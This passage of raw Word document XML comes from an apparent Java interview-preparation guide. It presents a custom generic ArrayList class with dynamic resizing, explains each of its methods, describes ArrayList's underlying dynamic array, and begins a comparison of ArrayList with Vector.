        <w:t xml:space="preserve"> like add(), get(), and size().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A32C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Here’s how you can implement a basic custom ArrayList class that allows specifying the initial capacity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5B4D0C"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Custom ArrayList Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A77AC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import java.util.Arrays;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1E380C" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68592C0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public class CustomArrayList&lt;T&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFBED2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Object[] elements; // Internal array to store the elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC4CEE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size;         // Number of elements in the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F41309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capacity;     // Current capacity of the internal array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1895D" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="272F885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onstructor with custom capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DECA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CustomArrayList(int initialCapacity) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BCE9B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itialCapacity &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5DB3B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apacity cannot be negative");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C3745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0528AF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capacity = initialCapacity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AAE8E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elements = new Object[capacity]; // Create an array with the initial capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB582F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size = 0; // Initially, the size is 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6F100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1C6E0DF" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45AD75F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an element to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A92A1D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add(T element) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5657157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internal array is full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E01D3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size == capacity) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CDF21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size(); // Resize the array when it's full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE3DA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71FA72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size++] = element; // Add the element and increment the size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B5BB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD9E380" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F9A0E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Resize the internal array when it's full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EC46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void resize() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E1F21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Double the capacity when resizing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710750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apacity = capacity * 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D667B3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 = Arrays.copyOf(elements, capacity); // Copy elements to a new array with doubled capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92B58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A4B5BED" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6812896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an element by index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E53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T get(int index) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E73C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dex &gt;= size || index &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BBE95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dexOutOfBoundsException("Index out of bounds");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF37ED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1565FA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T) elements[index]; // Return the element at the specified index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599FE68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65B9B9D" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636DB65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current size of the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F82AE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t size() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593965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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB9C6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4AC754E" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371CDDA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list is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696FF19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boolean isEmpty() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694D26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 == 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16578B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8FE3E0" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2625E69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all elements (for testing purposes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170AE22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printList() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1792C2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for (int i = 0; i &lt; size; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444CA6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elements[i] + " ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E16EA0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01BEE9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C387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62E4C5A" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3933D17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3F89C7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reate a CustomArrayList with an initial capacity of 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397B5A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ustomArrayList&lt;Integer&gt; list = new CustomArrayList&lt;&gt;(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20D6DB" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDF6DD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elements to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284D81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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6303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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A768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3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF307B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4); // This will trigger resizing since initial capacity is 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027CDC11" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B133C1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the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3FB0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printList(); // Output: 1 2 3 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F1CB0B" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0746A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element at index 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D5BF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lement at index 2: " + list.get(2)); // Output: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2DE587" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04CB3AD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size of the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039E33C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Size of the list: " + list.size()); // Output: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6735776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9321B3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624A9EF6"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 of the Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C133FC"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lastRenderedPageBreak/>
        <w:t>Internal Array (elements)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The elements array holds the actual data of the custom ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F4249D"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The constructor allows you to specify the initial capacity of the ArrayList. It checks if the capacity is non-negative and initializes the elements array accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022D5B41"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add(T element) Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21127347"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dds elements to the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDD3A25"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 xml:space="preserve">If the ArrayList is full (i.e., when size == capacity), it triggers a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by calling the resize() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510C75A2"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resize() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660999AC"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is method is called whenever the internal array is full, and it doubles the capacity of the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195942D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e method uses Arrays.copyOf() to create a new array with double the current capacity and copies the existing elements to the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064EB8C"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get(int index) Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD265D"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rieves an element at a specified index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA582B8"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It throws an IndexOutOfBoundsException if the index is invalid (i.e., negative or greater than the current size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94AAE0"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size() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116C5202"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urns the current number of elements in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392C94F"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isEmpty() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141801E"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Checks whether the list is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCBD04"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printList() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074C0C3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 helper method to print all elements in the list for testing purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7C36BA"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374C3445" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="786"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The example demonstrates creating a CustomArrayList with an initial capacity of 3. When 4 elements are added, the internal array gets resized to accommodate the additional element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017E0579"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4B498"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Resizable Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The custom ArrayList dynamically increases its capacity when it is full (doubling the capacity each time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB1098D"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The user can specify the initial capacity, which is useful for performance optimization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C865D3"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Generic Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This custom ArrayList is a generic class, allowing it to store any type of object (T).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7366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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E0BD2"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62" w:name="_Toc197867376"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which data structure is used by ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w14:paraId="693DF118" w14:textId="018B3553" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F7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lso called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as its underlying data structure. This dynamic array grows automatically when more space is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08571C5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the Underlying Data Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E6B0F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F9D2A"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al storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an ArrayList is a regular array (Object array), and the elements are stored in contiguous memory locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DD3F41"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array's capacity is exceeded, a new larger array is created, and the existing elements are copied into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D08924"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1529EC78"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the size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the internal array to accommodate more elements. This is done automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461688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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3BE9D"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it's backed by an array, an ArrayList provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant-time random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elements.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4CE4500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Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDEB87D"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ArrayList is created, an array of a specific size (default: 10) is allocated internally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14588A19"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elements are added, they are stored in the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B6B022"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 becomes full (i.e., its size equals its capacity), the ArrayList creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new, larger array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (usually double the size of the current array) and copies the existing elements into the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328FD408"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2C5FBEA"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Internally uses a dynamic array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E2504"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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BEB83D"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s its underlying data structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAEAEF6"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occurs when the array is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117AF30E"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due to the contiguous memory allocation of arrays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6B9EF" w14:textId="364DC23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06" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="751ABD5F"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3" w:name="_Toc197867377"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between ArrayList and Vector?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w14:paraId="1B5378ED" w14:textId="0C377EEA" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C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in differen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in Java lies in their synchronization, growth mechanism, and overall performance. Here’s a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C52DE6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ynchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B3278"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E3BF4A5"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xml:space="preserve"> by default. This means it is not thread-safe, so if multiple threads access an ArrayList concurrently and at least one thread modifies it, you must ensure external synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D25299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in single-threaded environments due to the lack of synchronization overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BA7DC6"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E77D391"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by default, making it thread-safe. Multiple threads can access a Vector concurrently without causing data inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC5C2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ynchronization comes at the cost of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>performance overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in single-threaded applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D69503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rowth Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3813D8"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E5E1D95"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50%</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of its current size when the array exceeds its capacity. For example, if the current capacity is 10, it will resize to 15 when it runs out of space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA1CE59"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975F16A"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100%</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of its current size by default. If the capacity is 10, it will resize to 20 when it runs out of space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB5B7B"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growth factor when creating a Vector by providing a second argument to the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB14DB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EFEF24B"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5A20368"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has </w:t>
      </w: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than Vector due to the lack of synchronization and smaller growth increments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636996A7"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choice in most cases when thread-safety is not a concern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C577D5"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6930731"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of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and larger growth increments, Vector is typically </w:t>
      </w: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xml:space="preserve"> than ArrayList in single-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518789FD"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egacy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C588AC"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50191F8D"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 of the modern Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
